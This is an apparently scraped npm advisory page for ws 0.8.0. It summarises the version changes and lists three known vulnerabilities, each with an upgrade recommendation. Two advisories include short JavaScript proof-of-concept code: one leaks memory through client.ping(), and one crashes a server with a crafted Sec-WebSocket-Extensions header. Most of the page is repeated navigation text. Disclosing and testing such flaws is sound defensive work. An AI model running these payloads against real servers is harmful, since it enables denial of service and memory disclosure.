Version Details and Security Vulnerabilities

📦

ws

0.8.0

Comparision Betweeen 0.8.0 and 0.7.2

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Version 0.8.0 Details

Ws version 0.8.0 is a minor update to the popular WebSocket library for Node.js, building upon the solid foundation of version 0.7.2. Both versions aim to provide a simple, fast, and thoroughly tested implementation of the WebSocket protocol (RFC-6455). The key differences lie in updated dependencies, specifically around native modules that enhance performance. In version 0.8.0, bufferutil and utf-8-validate have been updated to version 1.2.x from 1.1.x in version 0.7.2. These updates likely include performance improvements and bug fixes.

For developers, this means that upgrading to 0.8.0 offers the potential for better performance, especially in scenarios involving high-volume WebSocket communication or complex data encoding/decoding. These native modules are crucial for efficient buffer manipulation and UTF-8 validation, common tasks when handling WebSocket messages. Though the core API and functionality remain consistent, users should test their applications after upgrading. Also, they should check and update their Node.js environment to make sure is compatible with the new versions of bufferutil and utf-8-validate. The update was released on August 21, 2015, a few months after the release of version 0.7.2 (May 14, 2015), indicating a relatively quick maintenance cycle addressing potential issues and optimizing performance.

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

ws

0.8.0

Comparision Betweeen 0.8.0 and 0.7.2

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Version 0.8.0 Details

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 0.8.0 of the package ws.

All Security Vulnerabilities

All the vulnerabilities related to the version 0.8.0 of the package

Summary:

Remote Memory Disclosure in ws

Details:

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 
  })
})

Recommendation

Update to version 1.0.1 or greater.

Details about ws@0.8.0

Summary:

DoS due to excessively large websocket message in ws

Details:

Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.

Recommendation

Update to version 1.1.1 or later. Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.

Details about ws@0.8.0

Summary:

Denial of Service in ws

Details:

Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.

Proof of concept

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation

Update to version 3.3.1 or later.

Details about ws@0.8.0

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 0.8.0 of the package ws.

All Security Vulnerabilities

All the vulnerabilities related to the version 0.8.0 of the package

Summary:

Remote Memory Disclosure in ws

Details:

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 
  })
})

Recommendation

Update to version 1.0.1 or greater.

Details about ws@0.8.0

Summary:

DoS due to excessively large websocket message in ws

Details:

Recommendation

Update to version 1.1.1 or later. Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.

Details about ws@0.8.0

Summary:

Denial of Service in ws

Details:

Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.

Proof of concept

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation

Update to version 3.3.1 or later.

Details about ws@0.8.0

Version Details and Security Vulnerabilities

ws

Comparision Betweeen 0.8.0 and 0.7.2

Version 0.8.0 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

ws

Comparision Betweeen 0.8.0 and 0.7.2

Version 0.8.0 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Proof of Concept

Recommendation

Recommendation

Proof of concept

Recommendation

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Proof of Concept

Recommendation

Recommendation

Proof of concept

Recommendation

Version Details and Security Vulnerabilities

ws

Comparision Betweeen 0.8.0 and 0.7.2

Version 0.8.0 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

ws

Comparision Betweeen 0.8.0 and 0.7.2

Version 0.8.0 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

ws@0.8.0 GHSA-2mhh-w6q8-5hxw N/A

Proof of Concept

Recommendation

ws@0.8.0 GHSA-6663-c963-2gqg N/A

Recommendation

ws@0.8.0 GHSA-5v72-xg48-5rpm 7.5

Proof of concept

Recommendation

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

ws@0.8.0 GHSA-2mhh-w6q8-5hxw N/A

Proof of Concept

Recommendation

ws@0.8.0 GHSA-6663-c963-2gqg N/A

Recommendation

ws@0.8.0 GHSA-5v72-xg48-5rpm 7.5

Proof of concept

Recommendation